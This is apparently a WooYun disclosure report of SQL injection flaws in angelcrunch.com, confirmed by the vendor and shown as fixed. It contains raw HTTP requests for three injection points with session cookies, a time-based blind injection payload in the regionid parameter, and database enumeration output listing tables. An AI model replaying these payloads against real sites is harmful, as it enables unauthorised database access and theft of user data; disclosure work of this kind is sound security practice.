当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046924

漏洞标题:天使汇主站多处SQL注入漏洞

相关厂商:angelcrunch.com

漏洞作者: 小胖子

提交时间:2013-12-24 17:16

修复时间:2014-02-07 17:17

公开时间:2014-02-07 17:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-24: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经确认,细节仅向厂商公开
2014-01-03: 细节向核心白帽子及相关领域专家公开
2014-01-13: 细节向普通白帽子公开
2014-01-23: 细节向实习白帽子公开
2014-02-07: 细节向公众公开

简要描述:

刷点WB参加众测啊~

详细说明:

注入地址有很多处,注册用户登录后带cookies注入。
注入点1

POST /home/search HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keyword=1


keyword存在注入
注入点2 GET注入

GET /startup/?industryid=1 HTTP/1.1
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


get参数industryid存在注入
注入点3

GET /user/investor?p=0&regionid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


反正只要是存在search的,基本都有注入。

漏洞证明:

当前数据库:
current database: 'angelcrunch'
数据库:
available databases [3]:
[*] angelcrunch
[*] information_schema
[*] test
当前数据的表。

Database: angelcrunch
[75 tables]
+-------------------------+
| mc_emptoken |
| mc_usertoken |
| sq_dynamic |
| sq_user |
| startup |
| tb_blog |
| tb_blog_reply |
| tb_cafe |
| tb_cooperation_kibey |
| tb_crowdfunding |
| tb_demoday |
| tb_demoday_firm |
| tb_demoday_investor |
| tb_demoday_signup |
| tb_demoday_startup |
| tb_demoday_subscription |
| tb_dict |
| tb_disabledemail |
| tb_dynamic |
| tb_dynamic_temp |
| tb_edu_experience |
| tb_emp |
| tb_emp_role |
| tb_feedback |
| tb_feedback_email |
| tb_financing |
| tb_firm |
| tb_industry |
| tb_investor |
| tb_investor_industry |
| tb_investor_prefer |
| tb_investor_remark |
| tb_investor_service |
| tb_invite |
| tb_leadinvestor_apply |
| tb_mail |
| tb_mediareport |
| tb_msg |
| tb_notice |
| tb_privilege |
| tb_region |
| tb_resource |
| tb_role |
| tb_role_privilege |
| tb_school |
| tb_sns_bind |
| tb_startup |
| tb_startup_answer |
| tb_startup_application |
| tb_startup_comment |
| tb_startup_delivery |
| tb_startup_follow |
| tb_startup_industry |
| tb_startup_meeting |
| tb_startup_milestone |
| tb_startup_part |
| tb_startup_remark |
| tb_startup_setting |
| tb_startup_sharing |
| tb_startup_updateinfo |
| tb_startup_viewer |
| tb_startup_warmup |
| tb_startup_whitelist |
| tb_startupquestion |
| tb_sysvar |
| tb_test |
| tb_user |
| tb_user_dynamic |
| tb_user_email |
| tb_user_follow |
| tb_user_loginlog |
| tb_user_updateinfo |
| tb_wechat_bind |
| tb_wechat_show |
| tb_work_experience |
+-------------------------+

修复方案:

0x1:全站全面自查,发现基本没有过滤。
0x2:求20rank!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-12-24 17:25

厂商回复:

问题正在修复中...

最新状态:

2013-12-25:问题已修复